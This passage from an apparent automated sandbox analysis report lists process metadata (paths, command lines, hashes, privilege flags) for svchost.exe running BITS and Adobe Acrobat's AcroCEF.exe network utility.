                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:9
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Imagebase:0x7ff7e52b0000
                        File size:55'320 bytes
                        MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Target ID:10
                        Start time:02:13:09
                        Start date:15/01/2025
                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2088 --field-trial-handle=1680,i,15353841458623981023,14574021241036116658,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                        Imagebase:0x7ff6413e0000
                        File size:3'581'912 bytes
                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                        Has elevated privileges:false
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        No disassembly